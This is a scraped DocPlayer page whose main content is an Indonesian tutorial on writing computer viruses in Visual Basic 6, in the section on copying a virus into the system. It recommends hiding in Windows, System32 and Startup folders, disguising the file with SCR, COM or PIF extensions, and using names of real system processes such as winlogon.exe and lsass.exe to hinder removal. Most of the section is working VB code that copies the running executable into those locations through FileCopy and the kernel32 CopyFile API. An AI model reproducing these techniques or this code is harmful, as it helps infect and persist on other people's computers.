Penggandaan Ke Sistem

dokumen-dokumen yang mirip
REKAYASA TEKNIK PEMROGRAMAN PENCEGAHAN DAN PERLINDUNGAN DARI VIRUS LOKAL MENGGUNAKAN API VISUAL BASIC

Rekayasa Teknik Pemrograman Penyerangan Dan Pertahanan Virus Lokal Menggunakan API - Visual Basic

Rekayasa Teknik Pemrograman Penyerangan Dan Pertahanan Virus Lokal Menggunakan API - Visual Basic

BAB IV IMPLEMENTASI DAN PENGUJIAN. dan menjelasan berbagai hal yang berhubungan dengan pengujian.

Menampilkan List Komputer dan User-nya dalam Jaringan Intranet Dengan Fungsi WNet API

Sistem Distribusi Data Melalui COM+ Dengan Visual Basic

1. Desktop Microsoft Windows


BAB V PROSEDUR DAN FUNGSI

E-Trick Visual Basic 6.0

WinCE API. API Fungsi & prosedur. Microsoft Windows Kode program

BAB III PEMBAHASAN MASALAH

Gambar 8.1. Dialog Menu Editor.


Malang, Januari 2007 Penulis

Siapakan satu buah Form dengan satu timer dengan Interval=1000 dan 6 buah module.

MODUL I PENGENALAN VISUAL BASIC.NET

CARA MEMBUAT VIRUS INSTAN

Registry secara global dibagi beberapa handle key yaitu : HKEY_CLASSES_ROOT HKEY_CURRENT_USER HKEY_LOCAL_MACHINE HKEY_USERS HKEY_CURRENT_CONFIG

BAB IV IMPLEMENTASI DAN PEMBAHASAN SISTEM

Bab 1 Dasar Registry Windows XP


BAB IV IMPLEMENTASI DAN PENGUJIAN. dan tempat implementasi dari perangkat lunak ini adalah sebagai berikut :

Krisna D. Octovhiana. 1.1 Mengenal Struktur Kontrol.

Krisna D. Octovhiana

E-BOOK SERIES 03 TRIK MENGUMPULKAN ICON

8/29/2012. Mengoperasikan Sistem Operasi Berbasis GUI. Sistem Operasi Windows dan Perintah pada menu. Ikon ikon pada desktop windows.

Krisna D. Octovhiana. 1.1 Apa itu Array?

MODUL 2 KEGIATAN PEMELAJARAN 3

1. Buka Visual Basic 6 sobat. Buat project baru, masukkan componen Microsoft Winsock Control 2. Masukkan coding berikut

Modifikasi Tampilan Desktop

LAMPIRAN A. Private Sub Command4_Click() MsgBox "isi pesan ini sesuka anda!", vbexclamation, "Tentang" End Sub

MENGELOLA FILE. - Untuk menampilkan file, perlu membuka direktori penyimpanannya.

Merancang Project. Form Module Class Module Report. Form 1, Form 2, Minimarket (NamaProject) Gambar 4.1 Flowchart Project Sistem Informasi Minimarket

OPERASI FILE Operasi File Dalam Visual Basic Membuka File

Pre Processing. Memberikan gambaran jenis-jenis pre-processing

Program absen dengan menggunakan visual basic 6.0

Cepat Mahir Visual Basic 6.0. Cepat Mahir Visual Basic 6.0. Bab 10 Penggunaan Kontrol Array. Krisna D. Octovhiana

Pembuatan Virus dengan Visual Basic

Oleh : Mujahidin

BAB IV HASIL DAN UJI COBA

Krisna D. Octovhiana

MENU. 5.1 Membuat MenuStrip

TIPS MEMBUKA APLIKASI DENGAN CEPAT

Oleh : Uus Rusmawan Hal - 1 -

Sesi/Perkuliahan ke: XII

Pre Processing. Memberikan gambaran jenis-jenis pre-processing

LAPORAN PRAKTIKUM BAHASA PEMOGRAMAN VISUAL. Asnita Meydelia C. K OFF E

Petunjuk Instalasi Upgrade. Aplikasi Equity_AMCapital

BAB IV IMPLEMENTASI DAN PENGUJIAN

Pengenalan Visual Basic

Jenis-Jenis Virus Komputer Yang Paling Berbahaya

Mempercepat Kinerja Windows XP

Excel Sebagai Output VB 3.1 Excel Sebagai Output VB

Setting TCP/IP Klik menu start Klik Programs Klik Control Panel Klik Network Connection, hingga muncul gambar seperti berikut :


Krisna D. Octovhiana. 1.1 Mengenal Struktur Kontrol.

Modul Report Dan Form Report

BAB III MANAJEMEN FILE

DATABASE. Visual Data Manager

SENI PEMROGRAMAN VIRUS DENGAN MENGGUNAKAN VBS ( VISUAL BASIC SCRIPT

BAB II MICROSOFT VISUAL STUDIO

PANDUAN PENGGUNAAN. Joomla! Versi 1.5. Oleh: Anon Kuncoro Widigdo

Copyright 2015

A. Struktur Layar SAP dan Tombol Navigasi

PENGGUNAAN DATA DAN VARIABEL

PERANCANGAN PROGRAM WINDOWS TWEAK MANAGER PADA WINDOWS XP MENGGUNAKAN VISUAL BASIC 6.0

PEMROGRAMAN DASAR. Visual Basic 6


INSTALASI WEB SERVER PADA MICROSOFT WINDOWS

VISUAL BASIC 6.0 PEMROGRAMAN KOMPUTER. Visual Basic

MODUL PRAKTIKUM PEMROGRAMAN BERORIENTASI OBJEK (JAVA) PERTEMUAN 1 PENGENALAN LINGKUNGAN PEMROGRAMAN JAVA

Mengerti dan memahami pemrograman berbasis object Mengerti dan memahami pembuatan visualisasi untuk interface

MODUL IV PERULANGAN ( LOOPING )

Setting SMS Gateway dengan GAMMU Private Training Web Development Padang. 11/2/2014

Keterangan : Integer Long : tipe data untuk angka bulat Single, Double : tipe data untuk angka pecahan/desimal Currency : tipe data untuk angka mata

MODUL 2 Variabel, Val, If tunggal dan If bersarang + case

Memahami Proyek-Proyek Visual Basic dan Dasar-Dasar Visual Basic Code

STRUKTUR KENDALI PERULANGAN

Sesi 01 PTI. Modul Praktikum Pengantar Teknologi Informasi. Sistem OPERASI GUI windows

LISTING PROGRAM. Script Menu Utama Pada Game Tebak Kata

1. Instalasi Oracle & Membuat Starter Database

1. MENGENAL VISUAL BASIC


Krisna D. Octovhiana. 1.1 Mengenal Data dan Variabel.

Tampilan Program. Menambah dan mengatur property form di project. Menggunakan MDI Form dan MDI Child untuk membuat project

[Tutorial VB6] Bab 4 Penggunaan Data dan Variabel

PENGENALAN VISUAL BASIC NET

BAB IV IMPLEMENTASI DAN PENGUJIAN

Algoritma Pemrograman 2 B

BAB IX MEMBUAT MENU DENGAN FORM DESIGN

MODUL VI Penggunaan Struktur Kontrol Pengulangan

Konfigurasi Desktop BAB 2

STEP BY STEP MENJADI PROGRAMMER HANDAL DENGAN VB.NET

A. PROJECT PROJECT VISUAL BASIC

PENGGUNAAN EVENT, PROPERTY DAN METHOD

Transkripsi:

Ketika virus dijalankan oleh seseorang maka virus tersebut akan mulai melakukan aktivitasnya sebagai virus yaitu dengan melakukan penggandaan ke system computer (Infeksi ke system). Hal ini dilakukan agar virus tetap berada pada system meskipun sarana media penyebarannya telah dilepas, virus tersebut akan tetap aktif dengan cara mengaktifkan virus yang ter-copy di system sehingga system benarbenar telah terinfeksi oleh virus. Lokasi folder penggandaan virus pada system: 1. Windows (Winnt untuk windows NT) 2. System32 (System untuk windows 9x) 3. Startup 4. Application Data Lokasi diatas biasanya yang paling sering digunakan oleh virus. Mengapa harus lokasi tersebut? Karena untuk orang awam lokasi tersebut merupakan lokasi dimana file nya tidak boleh dihapus, karena hampir semua file yang ada pada folder tersebut merupakan file penting karena jika terjadi penghapusan terhadap file diperlukan oleh windows maka windows akan mengalami kerusakan. Dan hal ini dimanfaatkan oleh virus untuk melindungi dirinya. Selain lokasi folder virus juga melakukan perubahan extensi untuk menyamar agar virus tersebut sulit dicari. Extensi file yang sering digunakan oleh virus pada saat melakukan penggadaan pada system: 1. EXE 2. SCR 3. COM 4. PIF Extensi diatas semuanya memiliki cara akses yang sama. Meskipun terjadi perubahan extensi, virus tersebut tetap akan berjalan dengan normal. SCR digunakan virus untuk menyamar sebagai Screen Saver sehingga virus tersebut akan aktif jika Screen Saver aktif. Dan tentunya dengan melakukan sedikit perubahan pada registry agar virus tersebut menjadi Default pada Screen Saver. Agar penyamaran sukses virus juga menggunakan penamaan yang hampir sama dengan file system atau bahkan memang sama hanya saja lokasi file tersebut yang berbeda. Penamaan file yang sering digunakan virus pada system: 1. winlogon.exe 2. lsass.exe 3. services.exe 4. csrss.exe 5. smss.exe Page 3

6. svchost.exe 7. System 8. taskmgr.exe 9. explorer.exe 10. iexplorer.exe 11. notepad.exe 12. winword.exe Dengan menggunakan penamaan file seperti itu. Virus tersebut dapat membuat bingung orang terserang virus tersebut karena mereka tidak tahu apakah file tersebut benar-benar file system yang asli atau yang palsu (virus). Penamaan file yang bermasalah pada task manager adalah winlogon.exe, lsass.exe, services.exe, csrss.exe, smss.exe. Karena file tersebut justru akan dilindungi oleh task manager sehingga tidak dapat matikan prosesnya oleh task manager. Berikut ini adalah kode sederhana untuk melakukan penggandaan ke system Penggunaan perintah FileCopy: FileCopy sumber,tujuan Dim lokasi As String Dim namafile As String Private Sub Form_Load() With App lokasi =.Path & "\" namafile =.EXEName & ".exe" End With FileCopy lokasi & namafile, "C:\virus.exe" FileCopy lokasi & namafile, "C:\Windows\virus.com" FileCopy lokasi & namafile, "C:\Windows\virus.pif" FileCopy lokasi & namafile, "C:\Windows\System32\virus.scr" Dari perintah tersebut kita dapat mengetahui bahwa ketika virus dijalankan maka virus tersebut akan melakukan penggandaan diri pada drive C: C:\virus.exe C:\Window\virus.com C:\Windows\virus.pif C:\Windows\System32\virus.scr Berikut ini adalah proses penggandaan dengan menggunkan perintah API: Private Declare Function CopyFile Lib "kernel32" Alias "CopyFileA" _ (ByVal lpexistingfilename As String, ByVal lpnewfilename As String, _ ByVal bfailifexists As Long) As Long Page 4

Dim lokasi As String Dim namafile As String Private Sub Form_Load() With App lokasi =.Path & "\" namafile =.EXEName & ".exe" End With CopyFile lokasi & namafile, "C:\virus.exe", 0 CopyFile lokasi & namafile, "C:\Windows\virus.com", 0 CopyFile lokasi & namafile, "C:\windows\virus.pif", 0 CopyFile lokasi & namafile, "C:\windows\system32\virus.scr", 0 Cara penggunaannya hampir sama. Jika kita penggunakan perintah API berarti kita akan menggunakan perintah yang terhubung langsung dengan Sistem Operasi, tetapi jika kita menggunakan perintah FileCopy itu berarti kita menggunakan perintah yang telah disediakan oleh visual basic. Setelah visual basic mengenal perintah perintah tersebut baru visual basic akan mengirimkan perintah ke system operasi. Berikut ini adalah kode penggandaan pada tempat-tempat yang dianggap penting oleh Windows. Siapkan satu form dengan 5 buah command button dan satu buah module. Ketikan pada Form1: Dim lokasi As String Dim namafile As String Dim tujuan As String Private Sub Command1_Click() tujuan = GetSpecialfolder(CSIDL_DESKTOP) Private Sub Command2_Click() tujuan = GetSpecialfolder(CSIDL_PERSONAL) Private Sub Command3_Click() tujuan = GetSpecialfolder(CSIDL_STARTUP) Page 5

Private Sub Command4_Click() tujuan = GetWindowsPath Private Sub Command5_Click() tujuan = GetSystemPath Private Sub Form_Load() With App lokasi =.Path & "\" namafile =.EXEName & ".exe" End With Ketikan pada module: Public Declare Function CopyFile Lib "kernel32" Alias "CopyFileA" _ (ByVal lpexistingfilename As String, ByVal lpnewfilename As String, _ ByVal bfailifexists As Long) As Long Public Declare Function SHGetSpecialFolderLocation Lib "shell32.dll" _ (ByVal hwndowner As Long, ByVal nfolder As Long, pidl As ITEMIDLIST) As Long Public Declare Function SHGetPathFromIDList Lib "shell32.dll" Alias _ "SHGetPathFromIDListA" (ByVal pidl As Long, ByVal pszpath As String) As Long Public Declare Function GetSystemDirectory Lib "kernel32.dll" Alias _ "GetSystemDirectoryA" (ByVal lpbuffer As String, ByVal nsize As Long) As Long Public Declare Function GetWindowsDirectory Lib "kernel32.dll" Alias _ "GetWindowsDirectoryA" (ByVal lpbuffer As String, ByVal nsize As Long) As Long Public Declare Function CreateDirectory Lib "kernel32" Alias _ "CreateDirectoryA" (ByVal lppathname As String, _ lpsecurityattributes As SECURITY_ATTRIBUTES) As Long Public Type SHITEMID cb As Long abid As Byte End Type Public Type ITEMIDLIST mkid As SHITEMID End Type Public Type SECURITY_ATTRIBUTES nlength As Long lpsecuritydescriptor As Long binherithandle As Long Page 6

End Type Enum SFolder CSIDL_DESKTOP = &H0 'menunjukkan folder virtual yang menyatakan root untuk 'semua namespace (/Desktop) CSIDL_PROGRAMS = &H2 'menunjukkan folder sistem yang berisi grup program 'user (/Programs) CSIDL_CONTROLS = &H3 'menunjukkan folder virtual yang berisi ikon-ikon 'aplikasi Control Panel (/Control Panel) CSIDL_PRINTERS = &H4 'menunukkan folder virtual yang berisi printer- 'printer yang diinstall (/Printers) CSIDL_PERSONAL = &H5 'menunjukkan folder sistem yang digunakan untuk 'menyimpan dokumen umum user (/My Document) CSIDL_FAVORITES = &H6 'menunjukkan folder yang berisi item-item favorite 'user (/Favorites) CSIDL_STARTUP = &H7 'menunjukkan folder yang berisi grup program StartUp 'user (/Startup) CSIDL_RECENT = &H8 'menunjukkan folder sistem yang berisi dokumen-dokumen 'yang sering digunakan (/Recent) CSIDL_SENDTO = &H9 'menunjukkan folder yang berisi item menu Send To '(/Send To) CSIDL_BITBUCKET = &HA 'menunjukkan folder sistem yang berisi objek file 'pada RecycleBin user (/Recycle Bin) CSIDL_STARTMENU = &HB 'menunjukkan folder sistem yang berisi item-item 'menu Start (/StartMenu) CSIDL_DESKTOPDIRECTORY = &H10 'menunjukkan folder sistem yang dapatkan 'digunakan untuk menyimpan objek file secara 'fisik pada desktop CSIDL_DRIVES = &H11 'menunjukkan folder yang berisi segala sesuatu pada 'komputer lokal (/My Computer) CSIDL_NETWORK = &H12 'menunjukkan folder yang berisi objek link yang 'kemungkinan ada pda folder virtual My Network Places '(/My Network Places) CSIDL_NETHOOD = &H13 'menunjukkan folder yang menyatakan root dari 'hierarki namespace network (/NetHood) CSIDL_FONTS = &H14 'menunjukkan folder yang berisikan font (/FONT) CSIDL_TEMPLATES = &H15 'menunjukkan folder yang digunakan untuk menyimpan 'dokumen template (/Template) End Enum 'Get special folder Public Function GetSpecialfolder(JenisFolder As SFolder) As String Dim r As Long Dim IDL As ITEMIDLIST 'get special folder r = SHGetSpecialFolderLocation(100, JenisFolder, IDL) If r = NOERROR Then 'create buffer Path$ = Space$(512) 'Get path from IDList(IDL) r = SHGetPathFromIDList(ByVal IDL.mkid.cb, ByVal Path$) 'Remove chr$(0) GetSpecialfolder = Left$(Path, InStr(Path, Chr$(0)) - 1) Exit Function End If GetSpecialfolder = "" End Function 'Get System Path Public Function GetSystemPath() As String Page 7

On Error Resume Next Dim Buffer As String * 255 Dim x As Long x = GetSystemDirectory(Buffer, 255) GetSystemPath = Left(Buffer, x) & "\" End Function 'Get Windows Path Public Function GetWindowsPath() As String On Error Resume Next Dim Buffer As String * 255 Dim x As Long x = GetWindowsDirectory(Buffer, 255) GetWindowsPath = Left(Buffer, x) & "\" End Function Dengan menggunakan perintah diatas kita dapat membuat kode untuk penggandaan pada folder yang dianggap penting oleh windows. Page 8

2026 © DocPlayer.info Pengaturan dan alat privasi | Ketentuan | Tanggapan